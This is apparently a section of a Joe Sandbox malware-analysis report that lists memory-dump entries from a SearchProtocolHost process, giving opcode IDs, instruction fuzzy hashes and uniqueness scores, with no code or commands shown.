                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c1211bbf0b088a09765f3069d024c4400a5ffb201ee3a1d4dbe4869e64fc156
                                                                                      • Instruction ID: 3e62ddd3da5664b107d44caef40610bd6a1ab616394c8d3bca1c9498e2dff01d
                                                                                      • Opcode Fuzzy Hash: 0c1211bbf0b088a09765f3069d024c4400a5ffb201ee3a1d4dbe4869e64fc156
                                                                                      • Instruction Fuzzy Hash: 3B3138769053019FCB10EF59C44495ABBE5FF8A618F088AEEE488AB351D231ED05CFD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 777a24d072b638704d807c0e6ec4493ca262a603939f97b4fa2bffa240935710
                                                                                      • Instruction ID: f3060491c7f3ded10bba7ee7dfc462ba4cb8d620173cb125e0fecacb831154fb
                                                                                      • Opcode Fuzzy Hash: 777a24d072b638704d807c0e6ec4493ca262a603939f97b4fa2bffa240935710
                                                                                      • Instruction Fuzzy Hash: DC31BF32B006059FC710EFAAC984BAEF7FAFB48304F144529D546EB251E730E941CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                      • Instruction ID: 1e97c883e39f58dd6b4113771aaed3a496ebf9751ebc06802654aa21dc24b949
                                                                                      • Opcode Fuzzy Hash: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                      • Instruction Fuzzy Hash: 9C318A796083559FDB05DF18E84096ABBE9FF89710F040AAAF955DB391D730DC00CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d23b54d1fb541a450d77247bf7552e9e975a0663af838abde852dca72ae4b70
                                                                                      • Instruction ID: 7d082e30be9dbfeab1b411d56069c3dd7b107fe8b58dd24c685908752dbdae88
                                                                                      • Opcode Fuzzy Hash: 3d23b54d1fb541a450d77247bf7552e9e975a0663af838abde852dca72ae4b70
                                                                                      • Instruction Fuzzy Hash: 0F31D635A4062CABDB31EB14CC45FEEB7B9AB45740F0501A1F64DAB190D7B49E81CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e12c2932b01773d5aad3042cb7748e5c86ba915a844ccbbbb6e49a99cdd5240
                                                                                      • Instruction ID: e003e80b5c72058c4f7a875ca886769268c7f157497d5e0568fd4e60e279f46b
                                                                                      • Opcode Fuzzy Hash: 0e12c2932b01773d5aad3042cb7748e5c86ba915a844ccbbbb6e49a99cdd5240
                                                                                      • Instruction Fuzzy Hash: A431F7B69003109FDB31EF18C845B69B7B4EF96318F48C1A9DD459F386EA34E985CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e576e04abefb287bffeeb4f5e9d78ae9d15a824ce5d14675d05e1651a7bc9c3
                                                                                      • Instruction ID: 9a9a94e1c75d1bf08e53168f492bfb69a22fbf3b53d38103af95827a525b1ee3
                                                                                      • Opcode Fuzzy Hash: 2e576e04abefb287bffeeb4f5e9d78ae9d15a824ce5d14675d05e1651a7bc9c3
                                                                                      • Instruction Fuzzy Hash: 0821AE725247819BCB22DE59C890F9BB7E9FF88720F14455DF8489B240C730EA01DBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c10296873cf600f6b0a0c706f82a02acdaa8580c5042cc564ea67225c26c471
                                                                                      • Instruction ID: f05465cbcf5954fec3d47b343af0267863affacb6f5755fc6c56ec9f6e80fefd
                                                                                      • Opcode Fuzzy Hash: 0c10296873cf600f6b0a0c706f82a02acdaa8580c5042cc564ea67225c26c471
                                                                                      • Instruction Fuzzy Hash: 21319A35600604EFE721DF68C884F6AB7F9EF89354F1445A9E452DBA80E770EE01CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4bd8001dc5ec097feeb7df9cb1a635c2140dbce52fd38f6ec3ab9c16a2d2b849
                                                                                      • Instruction ID: c7bdd177eeee263e153adb0f95b78b4b95dbee0afa6add37496c5e387e6b14e1
                                                                                      • Opcode Fuzzy Hash: 4bd8001dc5ec097feeb7df9cb1a635c2140dbce52fd38f6ec3ab9c16a2d2b849
                                                                                      • Instruction Fuzzy Hash: 64314D75A00605DFCB54CF68C884AAEBBB5FFC4704B169999E849DB390E731F941CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6db57fa83884934f557ae49b29725597b1b2c55e2c101358a1156496920afb76
                                                                                      • Instruction ID: 69cc15cf080aece4c635790fc9ad47e7867ce0427ffd9da7a4f3057b692203ba
                                                                                      • Opcode Fuzzy Hash: 6db57fa83884934f557ae49b29725597b1b2c55e2c101358a1156496920afb76
                                                                                      • Instruction Fuzzy Hash: 3921F7392057009FFB22EF58D944B2ABBA5EF84B10F09079AE8518B741C770EC44CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 250bca29492f7f9284a1bb1d0eadeacd7c9c1604b6e862941f02df2eda603f90
                                                                                      • Instruction ID: 1a5a3a4c9cb78be4b856a246fab43f70d48f5a505e91696975a95670ab7c6cbd
                                                                                      • Opcode Fuzzy Hash: 250bca29492f7f9284a1bb1d0eadeacd7c9c1604b6e862941f02df2eda603f90
                                                                                      • Instruction Fuzzy Hash: DB219175900629EBCF14DF99C881ABEB7F8FF48704B5400A9E441FB240D778AD51CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69c195a3189068303f57af3f3cdfe3eb55acd34ac4728b34706f80ab0957ac2a
                                                                                      • Instruction ID: ec2504fc6f297cdb0c5abaa170e586a08cea9f482634933395a562bca25e9d7f
                                                                                      • Opcode Fuzzy Hash: 69c195a3189068303f57af3f3cdfe3eb55acd34ac4728b34706f80ab0957ac2a
                                                                                      • Instruction Fuzzy Hash: E421B0752012049FC719DF55C840BAABBF9EF89761F15416EE0068B290E770EC40CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c790fb2b0caa24992101f30be3806614145a5cc18fb12729bf82d02ce59b67c6
                                                                                      • Instruction ID: 8c3100a6a90605cb985122d75c983a63c226f3ef0f9b7c2a7370ea2a8c0ac8da
                                                                                      • Opcode Fuzzy Hash: c790fb2b0caa24992101f30be3806614145a5cc18fb12729bf82d02ce59b67c6
                                                                                      • Instruction Fuzzy Hash: 9D210730214B40DBCFB5EB64EC04B2277A5EF42320F140ADDEA5A8A5D2E730E841DF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03d73048c1557e6572f79edf33723a9f7eca74ce9479cfa7d416fcb5a3bac927
                                                                                      • Instruction ID: 152ce3d79457c8172def1a1f805e833b951682513cca1af2cd3450a04860c402
                                                                                      • Opcode Fuzzy Hash: 03d73048c1557e6572f79edf33723a9f7eca74ce9479cfa7d416fcb5a3bac927
                                                                                      • Instruction Fuzzy Hash: D921C236A00655FFDB22DF9AC884F5ABBB8EF457A8F0980A5E804DB210D334DD00CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f7cb5b33be95c3a0eda7fbab9689840bd0dfce7e308de141aff884a831abc087
                                                                                      • Instruction ID: 9c73baa412384d25fd91c2a466832216865eb05577dc84ea483b34bff81a235e
                                                                                      • Opcode Fuzzy Hash: f7cb5b33be95c3a0eda7fbab9689840bd0dfce7e308de141aff884a831abc087
                                                                                      • Instruction Fuzzy Hash: BC21F535745780AFE322D76C8C4CF24B7FAAB45B30F2C07A4EA249F7E2D76888018614
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ae0942126df66ff3c5474c52696c4dd20c6e7ade0e3f44b952407f983c1f0172
                                                                                      • Instruction ID: 0b2fdd80dbaf29ab200c8751f67eadcbbde1c4b9ca9875d7ba389cf9ac7b3681
                                                                                      • Opcode Fuzzy Hash: ae0942126df66ff3c5474c52696c4dd20c6e7ade0e3f44b952407f983c1f0172
                                                                                      • Instruction Fuzzy Hash: 4C21AC39610B509FC724DF69CC00B46B3F5EF88B04F1484ACA509CB751E331E852CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c9066818d86258c4d413c588a08b7b860e995b1436e643441160731872911da1
                                                                                      • Instruction ID: 0e38aecf7d4bcd03353e631e482995e93f5cd4115995477966ace8e9e598f570
                                                                                      • Opcode Fuzzy Hash: c9066818d86258c4d413c588a08b7b860e995b1436e643441160731872911da1
                                                                                      • Instruction Fuzzy Hash: CB2116B4E10308ABCB20DFAAD8819AEFBF8FF98710F10016BE405E7251D7709941CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 533efdc656079df3757ecdf43aa62950a26e6bb880bacb792dc767aa17bc2db5
                                                                                      • Instruction ID: 0f891fa80685cff2f05c9276ade77eee18bfeaba5f108eee922899ec4514c2a6
                                                                                      • Opcode Fuzzy Hash: 533efdc656079df3757ecdf43aa62950a26e6bb880bacb792dc767aa17bc2db5
                                                                                      • Instruction Fuzzy Hash: 90216436181B40DFC726EF58C944F5AB7F5FF08708F144AADE10A9A6A1DB34E801CB84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bbe76fecfd82bfec01a4138cf1315c43a8fc6a1c8f202c1cb2f4ed7934ce038f
                                                                                      • Instruction ID: 2601639f03e6f504e275c97c99236551bb41dfde7b3a61908a2e5970dcf58d99
                                                                                      • Opcode Fuzzy Hash: bbe76fecfd82bfec01a4138cf1315c43a8fc6a1c8f202c1cb2f4ed7934ce038f
                                                                                      • Instruction Fuzzy Hash: 1A11BF35701625EBDF11CF88DC80A2AB7E9EF4B75071881AEED08DF301D6B2E9018791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73372e22774d3b576cedd217275fb0ba7c95b1eb211c7fcae4737fb7ac4d421a
                                                                                      • Instruction ID: 934105523af6cc817c8a496990d901eb9acc11feac1f9c5910ae986c5eeea6bc
                                                                                      • Opcode Fuzzy Hash: 73372e22774d3b576cedd217275fb0ba7c95b1eb211c7fcae4737fb7ac4d421a
                                                                                      • Instruction Fuzzy Hash: D321F235A002098BFB15EF6DE4487EEB7A4EF88318F198259C8525B3D0CBB89845CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da23dde86853f266958152082cf0a879bee148db29bedead3d4cef7cac0b3fa1
                                                                                      • Instruction ID: ac3c9695a85e49e282d411feb365e5d395f8ae60553c206a2fcc89ac0db537fb
                                                                                      • Opcode Fuzzy Hash: da23dde86853f266958152082cf0a879bee148db29bedead3d4cef7cac0b3fa1
                                                                                      • Instruction Fuzzy Hash: 19217C35A00209EFDB14CF98D580B6ABBB5FB89314F25426ED105AB310C771AD02CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c9a3e154c7bb6cfb079b022062de2f301770996d35ead5c1e54d555445b12bb8
                                                                                      • Instruction ID: f51a5a03091e1a49cae9bf03904966429f33fb6b3cb38fccc7b0a4ae92751263
                                                                                      • Opcode Fuzzy Hash: c9a3e154c7bb6cfb079b022062de2f301770996d35ead5c1e54d555445b12bb8
                                                                                      • Instruction Fuzzy Hash: F0218975610B80EFC720DF69C880F66B3F8FF44750F08882DE69AD7650DA30A844DB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 18c81f3e6292db63e348d29c48f9977333e3f215c6734007c59eb7e50c7449ff
                                                                                      • Instruction ID: a9238a7cb631d2d542bf3531b3308f48446947c7aa8870e37a4e7068550d0144
                                                                                      • Opcode Fuzzy Hash: 18c81f3e6292db63e348d29c48f9977333e3f215c6734007c59eb7e50c7449ff
                                                                                      • Instruction Fuzzy Hash: 1D11B27E111A81AAD325FF59EA40A72B7E8EB99B80F1400A5E60097354E774DD02D764
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 33066563d0a6cf3f5b8389fc9fa5a2c3fed66d542e595767a3b86c4b8e1578fc
                                                                                      • Instruction ID: 680f688ed7307aae7d47dbbef7c11c85d440507f4a8a1354c0f80053826e65bf
                                                                                      • Opcode Fuzzy Hash: 33066563d0a6cf3f5b8389fc9fa5a2c3fed66d542e595767a3b86c4b8e1578fc
                                                                                      • Instruction Fuzzy Hash: 13118CB6A116849BCB24DF59C5C0B5ABBE9AF98750F0981BDD90AAB311D630DD00CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b902c66b122be24b5a871776eda487dbae3870aeafbe38ec8925481b8a39cb6d
                                                                                      • Instruction ID: 102bc7da9722f1bf9c2e9ffacd343e9b46710b8cebc204f71554567dadc0d873
                                                                                      • Opcode Fuzzy Hash: b902c66b122be24b5a871776eda487dbae3870aeafbe38ec8925481b8a39cb6d
                                                                                      • Instruction Fuzzy Hash: 27016639705780AFE325D66E8C88F67B7FDEF80350F0804A9FA098B791DA14CC008622
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b8cb3d911fa1dd93be8034d1247e4f4f300c9c3cf9245064d7249680be5cf90
                                                                                      • Instruction ID: 4d6471f0eac7728b611ca799d75cfc47510d4c67a994127a3ed91eb2c86e8957
                                                                                      • Opcode Fuzzy Hash: 5b8cb3d911fa1dd93be8034d1247e4f4f300c9c3cf9245064d7249680be5cf90
                                                                                      • Instruction Fuzzy Hash: CF01AD7670026DAB9B14DBE6C849CAFBBBCEF86614B04009AE909C7610E734FE05C770
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
